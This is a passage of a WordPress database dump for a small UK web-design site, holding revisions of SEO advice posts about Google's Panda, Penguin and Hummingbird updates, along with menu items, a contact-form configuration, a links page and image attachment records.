shouldn\'t optimise them just that unscrupulous and not very good SEOs have gone overboard with these practices.\r\n<h3>Thou shalt not receive lots of links all at once.<b></b></h3>\r\nA website that hasn\'t been doing terribly well in attracting links, then all of a sudden brings in a hundred all at once may well be buying them or using some other nefarious method. Unless of course it\'s a website that\'s invested in a piece of fantastic content that\'s been shared here there and everywhere. A pattern of links gained slowly but surely over time looks more natural.\r\n<h3>Thou shalt brand thy business to the hilt</h3>\r\nBranding includes everything from targeting your message and being consistent with your business’s voice, to networking on social media, to making good use of a logo.\r\n<h2><b>Hummingbird Overview</b></h2>\r\nPrecise and fast is what Google calls its new Hummingbird algorithm. Whereas Panda and Penguin were updates to the existing algorithm, Hummingbird is a big wholesale replacement of the old one. That doesn\'t mean that Penguin and Panda are obsolete the principles behind them have been incorporated into Hummingbird.\r\n\r\nIt\'s early days yet and there will be more updates coming to Hummingbird over the coming months. Here\'s an amalgamation of the best theories on working with Hummingbird.\r\n<h2>Hummingbird Commandments</h2>\r\n<h3>Thou shalt not panic.<b></b></h3>\r\nIt\'s a major overhaul yet no-one\'s died “ SEOs didn\'t even notice it happened (Google announced its existence a month after it arrived). Although Google is a moneymaking business whose main aim is make a profit, searchers will desert it if doesn\'t actively try to seek out the most relevant content on any given topic. If you provide that content and share it where you can, you\'ll be seen.\r\n<h3>Thou shalt keep providing excellent content that\'s aligned with the intent of your visitor.</h3>\r\nGoogle is all about intent these days. Search for will I need an umbrella tomorrow on Google and you\'ll be provided with a weather forecast. Google has learned to work out what the customer actually needs even if they don\'t ask for it in the normal search engine way, eg weather forecast London. Put yourself in the mind of your potential visitor and customer and decide what their intention is when they ask for something.\r\n<h3>Thou shalt find ways of search engine-proofing your site so you don\'t have to worry about algorithms.</h3>\r\nFind other ways of getting traffic to your site so that you\'ll be shielded to an extent from the vicissitudes of Google\'s algorithm-fiddling. Build an audience that you can rely on even when you aren\'t getting shown in the search engine ranking pages by growing email lists and marketing to them, blogging, networking yourself and being active on social media.\r\n<h2>Summary</h2>\r\nMuch of what Google is asking for is common sense. To appeal to your customers, you should have them in mind when you create your content. And that content that\'s attracting your customers interactions and visits to your site is what will help you rank in Google. Our next web post is the type of content local businesses can use to get their customers attention.<b>\r\n</b>','Google Algorithms','','inherit','closed','closed','','31-revision-v1','','','2017-10-26 08:39:11','2017-10-26 08:39:11','',31,'http://www.dogstardesign.co.uk/31-revision-v1',0,'revision','',0),(33,1,'2017-10-26 08:39:25','2017-10-26 08:39:25','<h1>Updates: Panda, Penguin and Hummingbird</h1>\r\n \r\n\r\nHave the number of people visiting your site dropped all of a sudden? Do the numbers tend to fluctuate? Or have you received warnings of unnatural links? As you probably already know, you may have been hit by one of Google\'s algorithm updates Panda and Penguin being the most famous, and Hummingbird the most recent (an overhaul rather an update).\r\n\r\nGoogle have introduced hundreds of these over the years and some of the\r\n\r\nbiggest have turned the SEO world upside down, generating thousands upon thousands of words of debate and comment.\r\n\r\nWhat this post aims to do is summarise how these changes has affected (or should affect) local business\'s web strategies.\r\n\r\nNB As readers as well as content producers, we all know what we want to find online is good content these aren\'t just for the benefit of search engines Your business will benefit from the commandments because people will enjoy looking at your and keep coming back. Hell, maybe even buying something from you!\r\n<h2>Panda Overview</h2>\r\nThis important update first hit Europe in April 2011. With it, Google attempted to crack down on the rubbish content that was, frankly, making the web a boring place to be at the time. Content farms were its main targets websites who had bibles-worth of meaningless content, created only to push their websites higher in Google\'s search rankings.\r\n<h2><b>Panda Commandments</b></h2>\r\n<h3>Thou shalt not copy content from other sites.<b></b></h3>\r\nThat includes scraping, ripping or any other black hat techniques. If you\'re having problems with plagiarisation yourself, here are <a href=\"http://www.jeffbullas.com/2013/04/11/7-tips-and-tools-to-stop-content-thieves-in-their-tracks/\">7 tips and tools</a> to stop it happening.\r\n<h3>Thou shalt not write thin content.</h3>\r\nHere\'s Google\'s <a href=\"https://support.google.com/webmasters/answer/2604719?hl=en\">definition of thin content</a> in case you\'re wondering. Providing rich, quality content that people will spend a bit of time on will help increase your ROI (return on investment) and lower your bounce rate (the number of people leaving your site after viewing only one page).\r\n<h3>Thou shalt not keyword-stuff your content.</h3>\r\nKeyword density used to be all the rage and we\'ve all seen sites with unreadable text. More often than not the reason for this text was simply to provide lots of keywords that Google would latch onto. Google penalizes sites for this content now, so there\'s no point doing it.\r\n<h3>Thou shalt create content aimed at the people who are likely to land on it.</h3>\r\nThe relevance and context of content is much more important than the number of visitors it brings in. For instance, a dental surgery may attract a lot of visitors with a post about cute cats in tutus, but those people won\'t hang around to read posts on root canal work.\r\n<h2><b>Penguin Overview</b></h2>\r\nThe Penguin update targeted unnatural, suspicious-looking link profiles. Up until then, unscrupulous companies were manipulating their search rankings by buying links to their site, and sites with links from very low quality sites were doing better than they should as a result. The quantity of links they had was helping them move up the search engine results, rather than the quality of those links. That changed after Penguin.\r\n<h2>Penguin Commandments</h2>\r\n<h3>Thou shalt not encourage links with overly optimised anchor text. <b></b></h3>\r\nThe reason being, Google likes to see a natural link profile. Interested websites are more likely to link to you using your company\'s name or the title of your В article, rather than a nicely search engine optimised piece of text. Check your backlink profile on <a href=\"https://www.majesticseo.com/\">Majestic SEO</a>.\r\n<h3>Thou shalt not encourage links from sites not relevant to your own content.<b></b></h3>\r\nOnly people interested in the kind of content you offer are likely to link to you, so if the dental surgery receives links from a porn site, Google goes Caught you!\r\n<h3>Thou shalt not over-optimise your web pages.<b></b></h3>\r\nThat\'s not to say you shouldn\'t optimise them just that unscrupulous and not very good SEOs have gone overboard with these practices.\r\n<h3>Thou shalt not receive lots of links all at once.<b></b></h3>\r\nA website that hasn\'t been doing terribly well in attracting links, then all of a sudden brings in a hundred all at once may well be buying them or using some other nefarious method. Unless of course it\'s a website that\'s invested in a piece of fantastic content that\'s been shared here there and everywhere. A pattern of links gained slowly but surely over time looks more natural.\r\n<h3>Thou shalt brand thy business to the hilt</h3>\r\nBranding includes everything from targeting your message and being consistent with your business’s voice, to networking on social media, to making good use of a logo.\r\n<h2><b>Hummingbird Overview</b></h2>\r\nPrecise and fast is what Google calls its new Hummingbird algorithm. Whereas Panda and Penguin were updates to the existing algorithm, Hummingbird is a big wholesale replacement of the old one. That doesn\'t mean that Penguin and Panda are obsolete the principles behind them have been incorporated into Hummingbird.\r\n\r\nIt\'s early days yet and there will be more updates coming to Hummingbird over the coming months. Here\'s an amalgamation of the best theories on working with Hummingbird.\r\n<h2>Hummingbird Commandments</h2>\r\n<h3>Thou shalt not panic.<b></b></h3>\r\nIt\'s a major overhaul yet no-one\'s died “ SEOs didn\'t even notice it happened (Google announced its existence a month after it arrived). Although Google is a moneymaking business whose main aim is make a profit, searchers will desert it if doesn\'t actively try to seek out the most relevant content on any given topic. If you provide that content and share it where you can, you\'ll be seen.\r\n<h3>Thou shalt keep providing excellent content that\'s aligned with the intent of your visitor.</h3>\r\nGoogle is all about intent these days. Search for will I need an umbrella tomorrow on Google and you\'ll be provided with a weather forecast. Google has learned to work out what the customer actually needs even if they don\'t ask for it in the normal search engine way, eg weather forecast London. Put yourself in the mind of your potential visitor and customer and decide what their intention is when they ask for something.\r\n<h3>Thou shalt find ways of search engine-proofing your site so you don\'t have to worry about algorithms.</h3>\r\nFind other ways of getting traffic to your site so that you\'ll be shielded to an extent from the vicissitudes of Google\'s algorithm-fiddling. Build an audience that you can rely on even when you aren\'t getting shown in the search engine ranking pages by growing email lists and marketing to them, blogging, networking yourself and being active on social media.\r\n<h2>Summary</h2>\r\nMuch of what Google is asking for is common sense. To appeal to your customers, you should have them in mind when you create your content. And that content that\'s attracting your customers interactions and visits to your site is what will help you rank in Google. Our next web post is the type of content local businesses can use to get their customers attention.<b>\r\n</b>','Google Algorithms','','inherit','closed','closed','','31-revision-v1','','','2017-10-26 08:39:25','2017-10-26 08:39:25','',31,'http://www.dogstardesign.co.uk/31-revision-v1',0,'revision','',0),(34,1,'2017-10-26 08:43:27','2017-10-26 08:43:27','<div class=\"post-content clearfix\">\r\n\r\nSearch engines like Google and Yahoo have algorithms that can detect your website automatically and all you need to do is create a website with good content that is friendly to their software in order for them to index your site. Google uses a spider to crawl the web on a regular basis and add sites to its index. This article presents some basics which can help you to develop a search engine friendly website so that you can get some free promotion.\r\n<h2>Master the Design Basics</h2>\r\nA website must be designed in such a way that it can be crawled or navigated easily. For that you must enable easy navigation through different pages and links. Every page should be reachable from at least one static text link present on the homepage. The content on different sub-pages must be logically connected and external links, if any, may be provided for reference content. The content of the page must be relevant to your users and should provide useful and unique information to them. That way they will be interested to re-visit the website. SEO tools must be used for keyword enrichment which helps in getting better ranks in search results.\r\n<h2>Optimise Your Pages</h2>\r\nApart from above mentioned guidelines, there are useful tricks that can be used to make pages more effective. You must always make use of title tags by giving the most precise objective of your website you can. Also, the meta-tag must provide an exhaustive description so that users can have a snapshot of the content at a glance of search engine result returned. As far as important parts of content are concerned, like important names or links; they must be in the orm of text rather than images as most search engines do not search through images. A good tip to help get better ranking is to have a number of backlinks on relevant external WebPages, which will aid your SEO. The backlinks also create more visibility on different websites.\r\n<h2>Follow Search Engine Guidelines</h2>\r\nAlmost all search engines specify their own quality checklists. If you are aiming for a particular search engine then you can go through their quality documents. Some general points can be cited here. Check for common malpractices and misbehaviour on these quality documents and make sure you avoid these mistakes at all costs.\r\n\r\nThe basic rule is to make your pages keeping in mind the users requirements and not the search engines requirements, which means you try to ensure you present the same content to search engines as you present to your users. By not following this rule you are doing what is referred to as cloaking. The content of the page should always add value to the visitors and it should be unique. Then and only then you can get quality visitors after they have come to your page through search results.\r\n\r\nIf there are subpages, then please avoid duplicacy of the content. Keyword enrichment is good but the content must not be overloaded with keywords only. Backlinks are great SEO tools but you should never have backlinks on spammers and offensive websites.\r\n<h2>Submit your website to search engine</h2>\r\nAlways refer to the guidelines published by various search engines to submit your website. Apart from the formalities to be performed before submission, which are specific to each search engines, some extra features can be attached to the website.\r\n\r\nYou can use a sitemap for your website, which is nothing but a file containing the links of all WebPages in your site, in a format which is recognised by search engines. This will make sure that all pages are covered by search engine. There are categories specified by search engines based on the content of the websites. Make sure you submit the website in the correct categories.\r\n\r\nRemember, search engines are just a platform for website promotion but it is you who has to put effort in to ensure the consistency and the popularity of your website. Regular monitoring of traffic on your website as well as competitor websites is a must. You must always keep the content updated. With simple efforts you can generate very good results.\r\n\r\n</div>','Top Tips to Improve Your Website','','publish','closed','closed','','top-tips-to-improve-your-website','','','2017-10-26 09:17:59','2017-10-26 09:17:59','',0,'http://www.dogstardesign.co.uk/?page_id=34',0,'page','',0),(35,1,'2017-10-26 08:43:27','2017-10-26 08:43:27','<div class=\"post-content clearfix\">\r\n\r\nSearch engines like Google and Yahoo have algorithms that can detect your website automatically and all you need to do is create a website with good content that is friendly to their software in order for them to index your site. Google uses a spider to crawl the web on a regular basis and add sites to its index. This article presents some basics which can help you to develop a search engine friendly website so that you can get some free promotion.\r\n<h2>Master the Design Basics</h2>\r\nA website must be designed in such a way that it can be crawled or navigated easily. For that you must enable easy navigation through different pages and links. Every page should be reachable from at least one static text link present on the homepage. The content on different sub-pages must be logically connected and external links, if any, may be provided for reference content. The content of the page must be relevant to your users and should provide useful and unique information to them. That way they will be interested to re-visit the website. SEO tools must be used for keyword enrichment which helps in getting better ranks in search results.\r\n<h2>Optimise Your Pages</h2>\r\nApart from above mentioned guidelines, there are useful tricks that can be used to make pages more effective. You must always make use of title tags by giving the most precise objective of your website you can. Also, the meta-tag must provide an exhaustive description so that users can have a snapshot of the content at a glance of search engine result returned. As far as important parts of content are concerned, like important names or links; they must be in the orm of text rather than images as most search engines do not search through images. A good tip to help get better ranking is to have a number of backlinks on relevant external WebPages, which will aid your SEO. The backlinks also create more visibility on different websites.\r\n<h2>Follow Search Engine Guidelines</h2>\r\nAlmost all search engines specify their own quality checklists. If you are aiming for a particular search engine then you can go through their quality documents. Some general points can be cited here. Check for common malpractices and misbehaviour on these quality documents and make sure you avoid these mistakes at all costs.\r\n\r\nThe basic rule is to make your pages keeping in mind the users requirements and not the search engines requirements, which means you try to ensure you present the same content to search engines as you present to your users. By not following this rule you are doing what is referred to as cloaking. The content of the page should always add value to the visitors and it should be unique. Then and only then you can get quality visitors after they have come to your page through search results.\r\n\r\nIf there are subpages, then please avoid duplicacy of the content. Keyword enrichment is good but the content must not be overloaded with keywords only. Backlinks are great SEO tools but you should never have backlinks on spammers and offensive websites.\r\n<h2>Submit your website to seacrh engine</h2>\r\nAlways refer to the guidelines published by various search engines to submit your website. Apart from the formalities to be performed before submission, which are specific to each search engines, some extra features can be attached to the website.\r\n\r\nYou can use a sitemap for your website, which is nothing but a file containing the links of all WebPages in your site, in a format which is recognised by search engines. This will make sure that all pages are covered by search engine. There are categories specified by search engines based on the content of the websites. Make sure you submit the website in the correct categories.\r\n\r\nRemember, search engines are just a platform for website promotion but it is you who has to put effort in to ensure the consistency and the popularity of your website. Regular monitoring of traffic on your website as well as competitor websites is a must. You must always keep the content updated. With simple efforts you can generate very good results.\r\n\r\n</div>','Top Tips to Improve Your Website','','inherit','closed','closed','','34-revision-v1','','','2017-10-26 08:43:27','2017-10-26 08:43:27','',34,'http://www.dogstardesign.co.uk/34-revision-v1',0,'revision','',0),(38,1,'2017-10-26 08:45:37','0000-00-00 00:00:00','','Home','','draft','closed','closed','','','','','2017-10-26 08:45:37','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=38',1,'nav_menu_item','',0),(39,1,'2017-10-26 08:45:38','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:38','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=39',1,'nav_menu_item','',0),(40,1,'2017-10-26 08:45:38','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:38','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=40',1,'nav_menu_item','',0),(41,1,'2017-10-26 08:45:38','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:38','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=41',1,'nav_menu_item','',0),(42,1,'2017-10-26 08:45:39','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:39','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=42',1,'nav_menu_item','',0),(43,1,'2017-10-26 08:45:39','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:39','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=43',1,'nav_menu_item','',0),(44,1,'2017-10-26 08:45:39','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:39','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=44',1,'nav_menu_item','',0),(45,1,'2017-10-26 08:45:40','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:40','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=45',1,'nav_menu_item','',0),(46,1,'2017-10-26 08:45:40','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:40','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=46',1,'nav_menu_item','',0),(47,1,'2017-10-26 08:45:40','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:40','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=47',1,'nav_menu_item','',0),(48,1,'2017-10-26 08:45:41','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:41','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=48',1,'nav_menu_item','',0),(49,1,'2017-10-26 08:45:41','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:41','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=49',1,'nav_menu_item','',0),(50,1,'2017-10-26 08:45:50','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2017-10-26 08:45:50','0000-00-00 00:00:00','',0,'http://www.dogstardesign.co.uk/?p=50',1,'nav_menu_item','',0),(51,1,'2017-10-26 08:54:55','2017-10-26 08:54:55',' ','','','publish','closed','closed','','51','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=51',7,'nav_menu_item','',0),(52,1,'2017-10-26 08:54:54','2017-10-26 08:54:54','','Online Business','','publish','closed','closed','','online-business','','','2017-10-26 09:10:03','2017-10-26 09:10:03','',0,'http://www.dogstardesign.co.uk/?p=52',1,'nav_menu_item','',0),(53,1,'2017-10-26 08:54:54','2017-10-26 08:54:54',' ','','','publish','closed','closed','','53','','','2017-10-26 09:10:03','2017-10-26 09:10:03','',0,'http://www.dogstardesign.co.uk/?p=53',3,'nav_menu_item','',0),(54,1,'2017-10-26 08:54:55','2017-10-26 08:54:55',' ','','','publish','closed','closed','','54','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=54',4,'nav_menu_item','',0),(55,1,'2017-10-26 08:54:54','2017-10-26 08:54:54','','Marketing','','publish','closed','closed','','marketing','','','2017-10-26 09:10:03','2017-10-26 09:10:03','',0,'http://www.dogstardesign.co.uk/?p=55',2,'nav_menu_item','',0),(56,1,'2017-10-26 08:54:55','2017-10-26 08:54:55',' ','','','publish','closed','closed','','56','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=56',5,'nav_menu_item','',0),(57,1,'2017-10-26 08:54:55','2017-10-26 08:54:55','','Google+','','publish','closed','closed','','google','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=57',6,'nav_menu_item','',0),(58,1,'2017-10-26 08:54:55','2017-10-26 08:54:55','','Blogging','','publish','closed','closed','','blogging','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=58',8,'nav_menu_item','',0),(59,1,'2017-10-26 08:54:55','2017-10-26 08:54:55',' ','','','publish','closed','closed','','59','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=59',9,'nav_menu_item','',0),(60,1,'2017-10-26 08:54:55','2017-10-26 08:54:55',' ','','','publish','closed','closed','','60','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/?p=60',10,'nav_menu_item','',0),(62,1,'2017-10-26 08:57:46','2017-10-26 08:57:46','<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \"Send\"]\nDog & Star Design \"[your-subject]\"\n[your-name] <wordpress@dogstardesign.co.uk>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Dog & Star Design (http://www.dogstardesign.co.uk)\namber.platts@vanillacircus.co.uk\nReply-To: [your-email]\n\n0\n0\n\nDog & Star Design \"[your-subject]\"\nDog & Star Design <wordpress@dogstardesign.co.uk>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Dog & Star Design (http://www.dogstardesign.co.uk)\n[your-email]\nReply-To: amber.platts@vanillacircus.co.uk\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2017-10-26 08:57:46','2017-10-26 08:57:46','',0,'http://www.dogstardesign.co.uk/?post_type=wpcf7_contact_form&p=62',0,'wpcf7_contact_form','',0),(63,1,'2017-10-26 08:58:10','2017-10-26 08:58:10','[contact-form-7 id=\"62\" title=\"Contact form 1\"]','Contact','','inherit','closed','closed','','6-revision-v1','','','2017-10-26 08:58:10','2017-10-26 08:58:10','',6,'http://www.dogstardesign.co.uk/6-revision-v1',0,'revision','',0),(65,1,'2017-10-26 09:01:20','2017-10-26 09:01:20','<ul>\r\n <li><a href=\"http://braintalent.co.uk/\"><b>brain talent</b></a></li>\r\n <li><a href=\"http://kennetweb.co.uk/\">Kennet Web</a></li>\r\n <li><a href=\"http://paytopost.co.uk/\">pay to post</a></li>\r\n <li><a href=\"http://arcsite.co.uk/\">arc site</a></li>\r\n <li><a href=\"http://dxf.co.uk/\">Dxf</a></li>\r\n <li><a href=\"http://free-submission.co.uk/\">free-submission</a></li>\r\n <li><a href=\"http://write-well.co.uk/\">write-well</a></li>\r\n <li><a href=\"http://researchsearch.co.uk/\">research search</a></li>\r\n <li><a href=\"http://crookedpig.co.uk/\">crooked pig</a></li>\r\n</ul>','Links','','publish','closed','closed','','links','','','2017-10-26 09:02:21','2017-10-26 09:02:21','',0,'http://www.dogstardesign.co.uk/?page_id=65',0,'page','',0),(66,1,'2017-10-26 09:01:21','2017-10-26 09:01:21',' ','','','publish','closed','closed','','66','','','2017-10-26 09:10:04','2017-10-26 09:10:04','',0,'http://www.dogstardesign.co.uk/66',11,'nav_menu_item','',0),(67,1,'2017-10-26 09:01:20','2017-10-26 09:01:20','<a href=\"http://braintalent.co.uk/\"><b>braintalent.co.uk </b></a>\r\n<a href=\"http://kennetweb.co.uk/\">KennetWeb.co.uk</a>\r\n<a href=\"http://paytopost.co.uk/\">paytopost.co.uk</a>\r\n<a href=\"http://arcsite.co.uk/\">arcsite.co.uk </a>\r\n<a href=\"http://dxf.co.uk/\">Dxf.co.uk</a>\r\n<a href=\"http://free-submission.co.uk/\">free-submission.co.uk</a>\r\n<a href=\"http://write-well.co.uk/\">write-well.co.uk</a>\r\n<a href=\"http://researchsearch.co.uk/\">researchsearch.co.uk </a>\r\n<a href=\"http://crookedpig.co.uk/\">crookedpig.co.uk </a>','Links','','inherit','closed','closed','','65-revision-v1','','','2017-10-26 09:01:20','2017-10-26 09:01:20','',65,'http://www.dogstardesign.co.uk/65-revision-v1',0,'revision','',0),(68,1,'2017-10-26 09:02:21','2017-10-26 09:02:21','<ul>\r\n <li><a href=\"http://braintalent.co.uk/\"><b>brain talent</b></a></li>\r\n <li><a href=\"http://kennetweb.co.uk/\">Kennet Web</a></li>\r\n <li><a href=\"http://paytopost.co.uk/\">pay to post</a></li>\r\n <li><a href=\"http://arcsite.co.uk/\">arc site</a></li>\r\n <li><a href=\"http://dxf.co.uk/\">Dxf</a></li>\r\n <li><a href=\"http://free-submission.co.uk/\">free-submission</a></li>\r\n <li><a href=\"http://write-well.co.uk/\">write-well</a></li>\r\n <li><a href=\"http://researchsearch.co.uk/\">research search</a></li>\r\n <li><a href=\"http://crookedpig.co.uk/\">crooked pig</a></li>\r\n</ul>','Links','','inherit','closed','closed','','65-revision-v1','','','2017-10-26 09:02:21','2017-10-26 09:02:21','',65,'http://www.dogstardesign.co.uk/65-revision-v1',0,'revision','',0),(69,1,'2017-10-26 09:04:28','2017-10-26 09:04:28','','business-call','','inherit','open','closed','','business-call','','','2017-10-26 09:04:28','2017-10-26 09:04:28','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/business-call.jpg',0,'attachment','image/jpeg',0),(70,1,'2017-10-26 09:04:28','2017-10-26 09:04:28','','calculator-178127_960_720','','inherit','open','closed','','calculator-178127_960_720','','','2017-10-26 09:04:28','2017-10-26 09:04:28','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/calculator-178127_960_720.jpg',0,'attachment','image/jpeg',0),(71,1,'2017-10-26 09:04:30','2017-10-26 09:04:30','','Computer_classroom','','inherit','open','closed','','computer_classroom','','','2017-10-26 09:04:30','2017-10-26 09:04:30','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/Computer_classroom.jpg',0,'attachment','image/jpeg',0),(72,1,'2017-10-26 09:04:32','2017-10-26 09:04:32','','computer-inside','','inherit','open','closed','','computer-inside','','','2017-10-26 09:04:32','2017-10-26 09:04:32','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/computer-inside.jpg',0,'attachment','image/jpeg',0),(73,1,'2017-10-26 09:04:33','2017-10-26 09:04:33','','inside-printer','','inherit','open','closed','','inside-printer','','','2017-10-26 09:04:33','2017-10-26 09:04:33','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/inside-printer.jpg',0,'attachment','image/jpeg',0),(74,1,'2017-10-26 09:04:34','2017-10-26 09:04:34','','pexels-photo-265691','','inherit','open','closed','','pexels-photo-265691','','','2017-10-26 09:04:34','2017-10-26 09:04:34','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/pexels-photo-265691.jpeg',0,'attachment','image/jpeg',0),(75,1,'2017-10-26 09:04:35','2017-10-26 09:04:35','','smartphone','','inherit','open','closed','','smartphone','','','2017-10-26 09:04:35','2017-10-26 09:04:35','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/smartphone.jpg',0,'attachment','image/jpeg',0),(76,1,'2017-10-26 09:04:37','2017-10-26 09:04:37','','startup-photos','','inherit','open','closed','','startup-photos','','','2017-10-26 09:04:37','2017-10-26 09:04:37','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/startup-photos.jpg',0,'attachment','image/jpeg',0),(77,1,'2017-10-26 09:04:38','2017-10-26 09:04:38','','tech-meeting','','inherit','open','closed','','tech-meeting','','','2017-10-26 09:04:38','2017-10-26 09:04:38','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/tech-meeting.jpg',0,'attachment','image/jpeg',0),(78,1,'2017-10-26 09:04:57','2017-10-26 09:04:57','','link building','','inherit','open','closed','','link-building','','','2017-10-26 09:04:57','2017-10-26 09:04:57','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/link-building.png',0,'attachment','image/png',0),(79,1,'2017-10-26 09:04:58','2017-10-26 09:04:58','','web-design','','inherit','open','closed','','web-design','','','2017-10-26 09:04:58','2017-10-26 09:04:58','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/web-design.jpg',0,'attachment','image/jpeg',0),(80,1,'2017-10-26 09:05:09','2017-10-26 09:05:09','','wd','','inherit','open','closed','','wd','','','2017-10-26 09:05:09','2017-10-26 09:05:09','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/wd.jpe',0,'attachment','image/jpeg',0),(81,1,'2017-10-26 09:05:10','2017-10-26 09:05:10','','wd1','','inherit','open','closed','','wd1','','','2017-10-26 09:05:10','2017-10-26 09:05:10','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/wd1.jpg',0,'attachment','image/jpeg',0),(82,1,'2017-10-26 09:05:10','2017-10-26 09:05:10','','web-design7','','inherit','open','closed','','web-design7','','','2017-10-26 09:05:10','2017-10-26 09:05:10','',0,'http://www.dogstardesign.co.uk/wp-content/uploads/2017/10/web-design7.jpg',0,'attachment','image/jpeg',0),(87,1,'2017-10-26 09:09:17','2017-10-26 09:09:17','','Media','','private','closed','closed','','media','','','2017-10-26 09:09:17','2017-10-26 09:09:17','',0,'http://www.dogstardesign.co.uk/?option-tree=media',0,'option-tree','',0),(91,1,'2017-10-26 09:17:59','2017-10-26 09:17:59','<div class=\"post-content clearfix\">\r\n\r\nSearch engines like Google and Yahoo have algorithms that can detect your website automatically and all you need to do is create a website with good content that is friendly to their software in order for them to index your site. Google uses a spider to crawl the web on a regular basis and add sites to its index. This article presents some basics which can help you to develop a search engine friendly website so that you can get some free promotion.\r\n<h2>Master the Design Basics</h2>\r\nA website must be designed in such a way that it can be crawled or navigated easily. For that you must enable easy navigation through different pages and links. Every page should be reachable from at least one static text link present on the homepage. The content on different sub-pages must be logically connected and external links, if any, may be provided for reference content. The content of the page must be relevant to your users and should provide useful and unique information to them. That way they will be interested to re-visit the website. SEO tools must be used for keyword enrichment which helps in getting better ranks in search results.\r\n<h2>Optimise Your Pages</h2>\r\nApart from above mentioned guidelines, there are useful tricks that can be used to make pages more effective. You must always make use of title tags by giving the most precise objective of your website you can. Also, the meta-tag must provide an exhaustive description so that users can have a snapshot of the content at a glance of search engine result returned. As far as important parts of content are concerned, like important names or links; they must be in the orm of text rather than images as most search engines do not search through images. A good tip to help get better ranking is to have a number of backlinks on relevant external WebPages, which will aid your SEO. The backlinks also create more visibility on different websites.\r\n<h2>Follow Search Engine Guidelines</h2>\r\nAlmost all search engines specify their own quality checklists. If you are aiming for a particular search engine then you can go through their quality documents. Some general points can be cited here. Check for common malpractices and misbehaviour on these quality documents and make sure you avoid these mistakes at all costs.\r\n\r\nThe basic rule is to make your pages keeping in mind the users requirements and not the search engines requirements, which means you try to ensure you present the same content to search engines as you present to your users. By not following this rule you are doing what is referred to as cloaking. The content of the page should always add value to the visitors and it should be unique. Then and only then you can get quality visitors after they have come to your page through search results.\r\n\r\nIf there are subpages, then please avoid duplicacy of the content. Keyword enrichment is good but the content must not be overloaded with keywords only. Backlinks are great SEO tools but you should never have backlinks on spammers and offensive websites.\r\n<h2>Submit your website to search engine</h2>\r\nAlways refer to the guidelines published by various search engines to submit your website. Apart from the formalities to be performed before submission, which are specific to each search engines, some extra features can be attached to the website.\r\n\r\nYou can use a sitemap for your website, which is nothing but a file containing the links of all WebPages in your site, in a format which is recognised by search engines. This will make sure that all pages are covered by search engine. There are categories specified by search engines based on the content of the websites. Make sure you submit the website in the correct categories.\r\n\r\nRemember, search engines are just a platform for website promotion but it is you who has to put effort in to ensure the consistency and the popularity of your website. Regular monitoring of traffic on your website as well as competitor websites is a must. You must always keep the content updated. With simple efforts you can generate very good results.\r\n\r\n</div>','Top Tips to Improve Your 